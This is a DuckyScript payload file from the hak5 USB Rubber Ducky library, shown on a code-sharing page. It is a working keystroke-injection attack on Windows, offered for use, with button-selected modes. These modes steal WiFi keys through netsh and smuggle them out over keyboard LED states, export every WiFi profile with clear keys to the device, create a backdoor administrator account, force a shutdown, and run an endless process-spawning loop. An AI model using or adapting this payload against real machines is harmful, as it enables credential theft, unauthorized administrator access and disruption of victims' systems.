Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/general/OneDuckToQuackThemAll/Payload.txt
2968 views
1
REM Title: One Duck To Quack Them All

2
REM Author: SaintCrossbow

3
REM Description: Pack multiple attacks in a single payload - click button to advance the attack

4
REM Click 1: LED G slow blink - Stealth exfil WiFi key (modified from original Hak5 payload)

5
REM Click 2: LED R slow blink - Direct USB copy of WiFi keys

6
REM Click 3: LED G fast blink - Add backdoor user

7
REM Click 4: LED R fast blink - Shutdown PC immediately

8
REM Click 5: LED R/G alternate - Fork bomb (really resource bomb)

9
REM Click 6: LED G morse A - USB storage

10
REM Target: Windows

11
REM Props: Darren Kitchen for the basis of stealth copy of wifi key

12


13
ATTACKMODE HID

14
DELAY 2000

15
LED_G

16


17
VAR $MODESELECT = 0

18
VAR $CLICK_OBS_WINDOW = 5000

19
VAR $CLICK_OBS_TIME = 0

20
VAR $CLICK_TICK = 800

21


22
FUNCTION QUIET_STEAL_WIFI()

23
  LED_R

24
  ATTACKMODE HID

25
  $_JITTER_ENABLED = TRUE

26
  DELAY 2000

27
  GUI r

28
  DELAY 1000

29
  STRING powershell "$cssid= (Get-NetConnectionProfile).Name[0]; netsh wlan show profile name=("$cssid") key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\tmptst"

30
  DELAY 300

31
  ENTER

32
  DELAY 3000

33
  GUI r

34
  DELAY 300

35
  $_JITTER_ENABLED = FALSE

36
  STRINGLN powershell "foreach($b in $(cat $env:tmp\tmptst -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'} else {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\tmptst"

37
  DELAY 100

38
  GUI r

39
  DELAY 300

40
  STRING powershell "$o=(cat $env:tmp\tmptst);Add-Type -A System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\tmptst"

41
  DELAY 100

42
  SAVE_HOST_KEYBOARD_LOCK_STATE

43
  $_EXFIL_MODE_ENABLED = TRUE

44
  $_EXFIL_LEDS_ENABLED = TRUE

45
  DELAY 100

46
  ENTER

47
  WAIT_FOR_SCROLL_CHANGE

48
  LED_G

49
  $_EXFIL_MODE_ENABLED = FALSE

50
  $_EXFIL_LEDS_ENABLED = FALSE

51
  RESTORE_HOST_KEYBOARD_LOCK_STATE 

52
END_FUNCTION

53


54
FUNCTION DIRECT_STEAL_WIFI()

55
  REM TODO Replace in final payload with DUCKY

56
  LED_R

57
  HIDE_PAYLOAD

58
  ATTACKMODE HID STORAGE

59
  $_JITTER_ENABLED = TRUE

60
  DELAY 9000

61
  GUI r

62
  DELAY 1500

63
  STRINGLN powershell 

64
  DELAY 3000

65
  STRINGLN $d=(Get-Volume -FileSystemLabel 'Ducky').DriveLetter+':'; cd $d; netsh wlan export profile key=clear 

66
  DELAY 3000

67
  STRINGLN exit

68
  RESTORE_PAYLOAD

69
  LED_G

70
END_FUNCTION

71


72
FUNCTION CREATE_BACKDOOR()

73
  LED_R

74
  ATTACKMODE HID

75
  $_JITTER_ENABLED = TRUE

76
  DELAY 2000

77
  GUI r

78
  DELAY 1000

79
  STRING cmd

80
  DELAY 500

81
  CTRL-SHIFT ENTER

82
  DELAY 2000

83
  ALT y

84
  DELAY 1000

85
  STRINGLN net user /add newuser newpass

86
  DELAY 500

87
  STRINGLN net localgroup administrators newuser /add

88
  DELAY 500

89
  STRINGLN exit

90
  LED_G

91
END_FUNCTION

92


93
REM I realize this is more of an iterative power hog than a strictly ballroom fork bomb

94
FUNCTION FORK_BOMB()

95
  LED_R

96
  ATTACKMODE HID

97
  $_JITTER_ENABLED = TRUE

98
  DELAY 2000

99
  GUI r

100
  DELAY 1000

101
  STRING powershell "while(1){&calc}"

102
  DELAY 200

103
  ENTER

104
END_FUNCTION

105


106
FUNCTION IMMEDIATE_SHUTDOWN()

107
  LED_R

108
  ATTACKMODE HID

109
  $_JITTER_ENABLED = TRUE

110
  DELAY 2000

111
  GUI r

112
  DELAY 1000

113
  STRING shutdown -t 0 -f -s

114
  DELAY 200

115
  ENTER

116
END_FUNCTION

117


118
REM Default is single click

119
LED_G

120
WAIT_FOR_BUTTON_PRESS

121


122
REM Clicking resets observation time to ensure you have right mode

123
REM So any attack will delay for $CLICK_OBS_WINDOW seconds

124
BUTTON_DEF

125
  $CLICK_OBS_TIME = 0

126
  $MODESELECT = ( $MODESELECT + 1 )  

127
END_BUTTON

128


129
REM Start the attack

130
WHILE ( $CLICK_OBS_TIME < $CLICK_OBS_WINDOW )

131
  IF ( $MODESELECT == 0) THEN

132
    LED_G

133
  ELSE IF ( $MODESELECT == 1 ) THEN

134
    LED_R

135
  ELSE IF ( $MODESELECT == 2 ) THEN

136
    LED_G

137
    DELAY 100

138
    LED_OFF

139
    DELAY 100

140
    LED_G

141
    DELAY 100

142
    LED_OFF

143
    DELAY 100

144
    LED_G

145
    DELAY 100

146
  ELSE IF ( $MODESELECT == 3 ) THEN

147
    LED_R

148
    DELAY 100

149
    LED_OFF

150
    DELAY 100

151
    LED_R

152
    DELAY 100

153
    LED_OFF

154
    DELAY 100

155
    LED_R

156
    DELAY 100

157
  ELSE IF ( $MODESELECT == 4 ) THEN

158
    LED_R

159
    DELAY 200

160
    LED_G

161
    DELAY 200

162
    LED_R

163
    DELAY 200

164
    LED_G

165
    DELAY 200

166
  ELSE 

167
	LED_G

168
	DELAY 100

169
	LED_OFF

170
	DELAY 100

171
    LED_G

172
	DELAY 500

173
	LED_OFF

174
	DELAY 100

175
  END_IF

176
  DELAY $CLICK_TICK

177
  $CLICK_OBS_TIME = ( $CLICK_OBS_TIME + $CLICK_TICK )

178
  LED_OFF

179
  DELAY $CLICK_TICK

180
  $CLICK_OBS_TIME = ( $CLICK_OBS_TIME + $CLICK_TICK )

181
END_WHILE

182


183
REM Main attack

184
IF ( $MODESELECT == 0) THEN

185
  QUIET_STEAL_WIFI()

186
  RESTART_PAYLOAD

187
ELSE IF ( $MODESELECT == 1 ) THEN

188
  DIRECT_STEAL_WIFI()

189
  RESTART_PAYLOAD

190
ELSE IF ( $MODESELECT == 2 ) THEN

191
  CREATE_BACKDOOR()

192
  RESTART_PAYLOAD

193
ELSE IF ( $MODESELECT == 3 ) THEN

194
  IMMEDIATE_SHUTDOWN()

195
ELSE IF ( $MODESELECT == 4 ) THEN

196
  FORK_BOMB()

197
ELSE

198
  BUTTON_DEF

199
    RESTART_PAYLOAD

200
  END_BUTTON

201
  ATTACKMODE HID STORAGE

202
  LED_G

203
END_IF

204


205